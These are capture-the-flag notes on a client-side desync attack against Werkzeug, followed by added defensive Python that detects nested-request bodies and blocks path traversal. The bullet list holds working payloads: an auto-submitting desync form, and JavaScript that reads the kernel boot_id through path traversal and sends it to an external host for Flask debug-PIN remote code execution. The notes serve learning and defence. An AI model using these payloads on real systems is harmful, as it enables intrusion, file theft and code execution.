Client Side Desync Attack

https://mizu.re/post/abusing-client-side-desync-on-werkzeug
https://github.com/zeyu2001/My-CTF-Challenges/tree/main/SEETF-2023/now-you-c-me


CVE: Werkzeug 2.0.1 & 2.1.1

https://mizu.re/post/abusing-client-side-desync-on-werkzeug

Desynth Recruit - web

  • Open Redirect => http://127.0.0.1:1337/go?to=//webhook.site
  • Client Side Desync to XSS the bot: https://mizu.re/post/abusing-client-side-desync-on-werkzeug
  • <form id="x" action="http://127.0.0.1:1337/" method="POST" enctype="text/plain"><textarea name="GET http://xpl.xanhacks.xyz:4444 HTTP/1.1Foo: x">Mizu</textarea><button type="submit">CLICK ME</button></form><script>x.submit()</script>
  • Read and exfiltrate the file used to generate the Flask debug PIN, e.g.:
  • var request = new XMLHttpRequest();request.open('GET', '/api/ipc_download?file=../../../../../proc/sys/kernel/random/boot_id', false);request.send();var flag = request.responseText;window.location.href = "http://xpl.xanhacks.xyz:4444?flag=" + flag;
  • Generate PIN + RCE via /console
  • SEETF Client side desync attack: https://github.com/zeyu2001/My-CTF-Challenges/tree/main/SEETF-2023/now-you-c-me
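The chain above relies on two things a defender can check for: a text/plain form post whose body is really a nested HTTP request (the desync payload), and a download endpoint that joins user input onto a directory without bounding it (the boot_id read). The following is an added example written for this note, not code from the mizu.re write-up, the SEETF challenge or Werkzeug; the request bytes, the base directory and the function names are constructed for illustration.

```python
"""Defensive checks for the two weaknesses chained in the note above.
Added example for this page; it is not code from the mizu.re write-up,
the SEETF challenge, or Werkzeug. Sample requests and paths are constructed."""
import re
from pathlib import Path
from typing import Optional

# Shape of an HTTP/1.x request line: METHOD SP target SP HTTP/1.x CRLF
REQUEST_LINE = re.compile(
    rb"^(GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH)\s+\S+\s+HTTP/1\.[01]\r?\n"
)


def split_request(raw: bytes):
    """Split raw request bytes into (request_line, headers, body).
    Header names are lower-cased so lookups are case-insensitive."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request head")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip()
    return lines[0], headers, body


def looks_like_desync_attempt(raw: bytes) -> bool:
    """True when the Content-Length-delimited body of a request itself starts
    with an HTTP request line. A browser form (urlencoded, multipart or
    text/plain) never produces that shape on its own, so a proxy rule or a
    log review can treat it as a client-side desync attempt, not a form post."""
    _, headers, body = split_request(raw)
    length = int(headers.get("content-length", b"0") or 0)
    return REQUEST_LINE.match(body[:length]) is not None


def resolve_download(base_dir: str, requested: str) -> Optional[Path]:
    """Hardened counterpart of a download endpoint that joins user input onto a
    directory. Resolve the joined path and require it to stay strictly inside
    base_dir; return None (caller answers 400/404) for traversal such as
    ../../proc/... or for an absolute path that escapes the directory."""
    base = Path(base_dir).resolve()
    target = (base / requested).resolve()
    if target == base or not target.is_relative_to(base):
        return None
    return target


# Constructed samples: a normal text/plain form post and one whose body is a
# nested request, the shape produced by a textarea named like a request line.
def build_post(body: bytes, content_type: bytes = b"text/plain") -> bytes:
    return (
        b"POST / HTTP/1.1\r\nHost: 127.0.0.1:1337\r\n"
        b"Content-Type: " + content_type + b"\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body
    )


BENIGN_POST = build_post(b"comment=hello\r\n")
NESTED_POST = build_post(b"GET /x HTTP/1.1\r\nFoo: x=Mizu\r\n")

if __name__ == "__main__":
    print("benign flagged:", looks_like_desync_attempt(BENIGN_POST))
    print("nested flagged:", looks_like_desync_attempt(NESTED_POST))
    print(resolve_download("/srv/files", "../../proc/sys/kernel/random/boot_id"))
    print(resolve_download("/srv/files", "reports/a.txt"))
```

The desync check inspects only the bytes the request declares as its body; whatever a vulnerable server does with the remainder of the connection is exactly what the check is meant to catch before it reaches that server. The path check resolves before comparing, so `..` segments, absolute paths and symlinks inside the base directory are all judged by where they actually land. `Path.is_relative_to` needs Python 3.9 or newer.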
